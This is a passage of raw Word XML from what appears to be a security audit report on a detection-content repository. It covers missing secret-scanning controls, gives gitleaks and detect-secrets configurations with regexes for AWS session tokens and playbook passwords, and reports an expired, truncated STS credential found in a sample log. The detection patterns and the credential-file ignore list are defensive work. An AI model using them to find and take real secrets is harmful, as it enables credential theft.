        <w:t xml:space="preserve">, and it lists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.vscode/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.code-snippets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> although </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.vscode/settings.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>launch.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>extensions.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>escu_6.code-snippets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>security-content.code-snippets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are tracked (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git ls-files .vscode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 5 files) – the ignore file is not maintained. GitHub secret scanning / push protection is enabled per repository by an admin, not through files; the public repo gets partner-pattern scanning for free, but that would not catch any issue in this report (STS tokens, playbook passwords, PII are not partner patterns).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> n/a (control gap that allowed SEC-01…07). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not a vulnerability in itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -rniE 'gitleaks|trufflehog|detect-secrets|ggshield' .github/ .pre-commit-config.yaml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → no output; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ls .gitleaks.toml .secrets.baseline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → not found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .pre-commit-config.yaml (additions)</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 repo: https://github.com/gitleaks/gitleaks</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rev: v8.21.2</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hooks:</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 id: gitleaks</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 repo: https://github.com/Yelp/detect-secrets</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rev: v1.5.0</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hooks:</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 id: detect-secrets</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args: ['--baseline', '.secrets.baseline']</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exclude: ^lookups/csv/(dynamic_dns_providers_default|sslbl_ssl_certificate_blacklist)\.csv$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .gitleaks.toml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[extend]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>useDefault = true</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[[rules]]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>id = "aws-sts-session-token"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>description = "AWS STS session token"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>regex = '''IQoJb3JpZ2luX2Vj[A-Za-z0-9+/=]{100,}'''</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[[rules]]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>id = "soar-playbook-literal-password"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>description = "Literal password in SOAR playbook parameters"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>regex = '''"(?:new_)?password"\s*:\s*"(?!(?:filtered-data|playbook_input|artifact|[a-z_]+:custom_function|action_result)[^"]*")[^"\s]{6,}"'''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>path = '''playbooks/.*\.(json|py)$'''</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[allowlist]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>description = "documented placeholder values"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>regexes = ['''AKIAIOSFODNN7EXAMPLE''', '''wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY''', '''EXAMPLE_SESSION_TOKEN''']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>paths = ['''response_templates/.*\.json$''', '''\.github/workflows/response_templates/mcopenapi_public\.yml$''']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .github/workflows/secret-scan.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name: secret scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>on: [pull_request, push]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>permissions: { contents: read }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>jobs:</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gitleaks:</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runs-on: ubuntu-latest</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steps:</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 uses: actions/checkout@v7</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with: { fetch-depth: 0 }            # full history so history-mode works</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 uses: gitleaks/gitleaks-action@v2    # pin to a commit SHA in production</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env:</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GITHUB_TOKEN: ${{ github.token }}</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GITLEAKS_CONFIG: .gitleaks.toml</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 name: data_sources sanitiser</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run: python3 scripts/scrub_cloudtrail_samples.py --check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Also: add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.pem *.key *.p12 *.pfx id_rsa* .aws/ .netrc *.secret .env.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, remove the stale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.vscode/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.code-snippets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lines or untrack the files, ask the GitHub org admin to enable *secret scanning + push protection* with custom patterns for the STS/playbook regexes above, and run a one-off full-history scan on an unshallowed clone (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git fetch --unshallow &amp;&amp; gitleaks git . --config .gitleaks.toml</w:t>
      </w:r>
      <w:r>
        <w:t>) before deciding whether history rewriting (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git filter-repo</w:t>
      </w:r>
      <w:r>
        <w:t>) is warranted for SEC-03/04/05.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-693 (Protection Mechanism Failure), CWE-1059; OWASP Top 10 2021 A05, A08 (Software &amp; Data Integrity Failures); ASVS 1.14.x, 14.1.x; ATT&amp;CK T1552.001 / T1552.004 (what the control should prevent); NIST SP 800-53r5 SA-11, SA-15(7), CM-3, SI-7; NIST CSF 2.0 PR.PS-06, DE.CM-09; ISO/IEC 27001:2022 A.8.28 (Secure coding), A.8.25, A.8.32; SANS/CERT General Coding Practices; GitHub docs "About secret scanning / push protection"; gitleaks &amp; detect-secrets documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-693 Protection Mechanism Failure; CWE-1059 Insufficient Technical Documentation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration, A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1552.001 Unsecured Credentials: Credentials In Files, T1552.004 Unsecured Credentials: Private Keys. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-11 Developer Testing and Evaluation, SA-15 Development Process, Standards, and Tools, CM-3 Configuration Change Control, SI-7 Software, Firmware, and Information Integrity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security, DE.CM Detect - Continuous Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding, A.8.25 Secure development life cycle, A.8.32 Change management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SEC-04 — Expired AWS STS temporary credential committed in a sample log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Not exploitable (expired 2021-01-22).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data_sources/aws_cloudtrail_assumerolewithsaml.yml:120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Informational – CVSS v3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (credential expired </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2021-01-22T03:59:16Z</w:t>
      </w:r>
      <w:r>
        <w:t>; no secret key)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/aws_cloudtrail_assumerolewithsaml.yml:120</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"credentials": {"accessKeyId": "ASIA… (len 20)", "expiration": "Jan 22, 2021 3:59:16 AM", "sessionToken": "IQoJ… (len 920)"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CloudTrail does not log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>secretAccessKey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so this is two of three parts of a temporary credential whose lifetime ended in January 2021. It is not usable, but it is the one item in the repo that *is* a credential artefact rather than an identifier, it contains the real account ID in its base64 body (SEC-03 PoC), and it normalises pasting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>responseElements.credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. gitleaks has no STS-token rule and misses it; detect-secrets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Base64HighEntropyString</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> catches it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> n/a. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
